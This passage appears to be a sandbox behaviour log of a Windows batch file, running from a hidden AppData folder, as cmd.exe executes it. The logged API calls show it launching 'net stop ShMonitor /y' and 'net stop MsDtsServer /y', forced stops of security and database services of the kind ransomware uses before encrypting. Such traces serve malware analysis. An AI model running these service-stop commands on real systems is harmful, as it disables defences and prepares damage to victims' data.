lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.015] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0205.015] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0205.015] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0205.015] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.015] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ShMonitor /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ShMonitor /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ShMonitor /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x850, dwThreadId=0x860)) returned 1 [0205.019] CloseHandle (hObject=0x78) returned 1 [0205.019] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.019] GetProcessHeap () returned 0x3e0000 [0205.019] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.019] GetEnvironmentStringsW () returned 0x3f8408* [0205.019] GetProcessHeap () returned 0x3e0000 [0205.019] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.020] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.020] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0205.161] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0205.161] CloseHandle (hObject=0x74) returned 1 [0205.161] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0205.161] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0205.161] GetProcessHeap () returned 0x3e0000 [0205.161] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.161] GetEnvironmentStringsW () returned 0x3f8408* [0205.162] GetProcessHeap () returned 0x3e0000 [0205.162] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.162] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.162] GetProcessHeap () returned 0x3e0000 [0205.162] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.162] GetEnvironmentStringsW () returned 0x3f8408* [0205.162] GetProcessHeap () returned 0x3e0000 [0205.162] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.163] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.163] GetProcessHeap () returned 0x3e0000 [0205.163] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0205.163] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0205.163] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.163] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0205.163] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.163] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0205.163] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.163] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0205.163] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.163] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0205.164] SetConsoleInputExeNameW () returned 0x1 [0205.164] GetConsoleOutputCP () returned 0x1b5 [0205.164] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0205.164] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0205.164] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0205.164] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.164] SetFilePointer (in: hFile=0x74, lDistanceToMove=3893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf35 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0205.165] GetProcessHeap () returned 0x3e0000 [0205.165] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0205.165] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.165] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf35 [0205.165] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x98c, lpOverlapped=0x0) returned 1 [0205.165] SetFilePointer (in: hFile=0x74, lDistanceToMove=3918, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4e [0205.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MsDtsServer /y\r\n /y\r\ny\r\n/y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 25 [0205.166] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.166] GetFileType (hFile=0x74) returned 0x1 [0205.166] _get_osfhandle (_FileHandle=3) returned 0x74 [0205.166] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf4e [0205.166] GetProcessHeap () returned 0x3e0000 [0205.166] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0205.166] GetProcessHeap () returned 0x3e0000 [0205.166] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0205.169] _tell (_FileHandle=3) returned 3918 [0205.169] _close (_FileHandle=3) returned 0 [0205.169] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0205.170] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0205.170] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0205.170] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0205.170] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0205.170] _wcsicmp (_String1="net", _String2="CD") returned 11 [0205.170] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0205.170] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0205.170] _wcsicmp (_String1="net", _String2="REN") returned -4 [0205.170] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0205.170] _wcsicmp (_String1="net", _String2="SET") returned -5 [0205.170] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0205.170] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0205.170] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0205.170] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0205.170] _wcsicmp (_String1="net", _String2="MD") returned 1 [0205.170] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0205.170] _wcsicmp (_String1="net", _String2="RD") returned -4 [0205.170] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0205.170] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0205.170] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0205.170] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0205.170] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0205.170] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0205.170] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0205.170] _wcsicmp (_String1="net", _String2="VER") returned -8 [0205.170] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0205.170] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0205.170] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0205.170] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0205.170] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0205.170] _wcsicmp (_String1="net", _String2="START") returned -5 [0205.170] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0205.170] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0205.170] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0205.170] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0205.170] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0205.170] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0205.170] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0205.170] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0205.171] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0205.171] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0205.171] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0205.171] SetErrorMode (uMode=0x0) returned 0x1 [0205.171] GetProcessHeap () returned 0x3e0000 [0205.171] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0205.171] GetProcessHeap () returned 0x3e0000 [0205.171] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0205.171] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.172] GetProcessHeap () returned 0x3e0000 [0205.172] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0205.172] GetProcessHeap () returned 0x3e0000 [0205.172] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0205.172] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0205.172] GetProcessHeap () returned 0x3e0000 [0205.172] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0205.172] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.172] GetProcessHeap () returned 0x3e0000 [0205.172] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0205.172] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0205.172] GetProcessHeap () returned 0x3e0000 [0205.172] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0205.173] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.173] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.173] GetLastError () returned 0x2 [0205.174] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.174] GetLastError () returned 0x2 [0205.175] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.175] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.175] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0205.176] GetLastError () returned 0x2 [0205.176] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0205.176] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0205.176] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.177] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0205.177] SetErrorMode (uMode=0x0) returned 0x1 [0205.177] GetProcessHeap () returned 0x3e0000 [0205.177] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0205.177] GetProcessHeap () returned 0x3e0000 [0205.177] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0205.178] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0205.178] GetProcessHeap () returned 0x3e0000 [0205.178] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0205.178] GetProcessHeap () returned 0x3e0000 [0205.178] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0205.178] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0205.178] GetProcessHeap () returned 0x3e0000 [0205.178] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0205.178] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.178] GetProcessHeap () returned 0x3e0000 [0205.178] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0205.178] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0205.178] GetProcessHeap () returned 0x3e0000 [0205.179] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0205.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.179] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.179] GetLastError () returned 0x2 [0205.180] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.180] GetLastError () returned 0x2 [0205.180] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0205.181] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0205.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0205.181] GetLastError () returned 0x2 [0205.181] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0205.182] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0205.182] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.182] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0205.182] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0205.182] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0205.183] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0205.183] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MsDtsServer /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MsDtsServer /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MsDtsServer /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x878, dwThreadId=0x87c)) returned 1 [0205.187] CloseHandle (hObject=0x74) returned 1 [0205.187] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0205.187] GetProcessHeap () returned 0x3e0000 [0205.187] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.187] GetEnvironmentStringsW () returned 0x3f8408* [0205.187] GetProcessHeap () returned 0x3e0000 [0205.187] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.187] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.187] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0205.355] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0205.355] CloseHandle (hObject=0x78) returned 1 [0205.355] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0205.355] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0205.355] GetProcessHeap () returned 0x3e0000 [0205.356] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.356] GetEnvironmentStringsW () returned 0x3f8408* [0205.356] GetProcessHeap () returned 0x3e0000 [0205.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.356] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.356] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0205.356] GetProcessHeap () returned 0x3e0000 [0205.356] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0205.356] GetEnvironmentStringsW () returned 0x3f8408* [0205.356] GetProcessHeap () returned 0x3e0000 [0205.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0205.357] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0205.357] GetProcessHeap () returned 0x3e0000 [0205.357] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0205.357] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0205.357] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.357] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0205.357] _get_osfhandle (_FileHandle=1) returned 0x264 [0205.357] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0205.357] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.357] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0205.357] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0205.357] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0205.358] SetConsoleInputExeNameW () returned 0x1 [0205.358] GetConsoleOutputCP () returned 0x1b5 [0205.358] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0205.358] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0205.358] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0205.358] _get_osfhandle (_FileHandle=3) returned 0x78 [0205.358] SetFilePointer (in: hFile=0x78, lDistanceToMove=3918, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4e [0205.358] GetProcessHeap () returned 0x3e0000 [0205.358] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0205.358] GetProcessHeap () returned 0x3e0000 [0205.358] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0205.358] GetProcessHeap () returned 0x3e0000 [0205.358] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0205.358] GetProcessHeap () returned 0x3e0000 [0205.358] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0205.358] GetProcessHeap () returned 0x3e0000 [0205.358] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0205.359] GetProcessHeap () returned 0x3e0000 [0205.359] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | 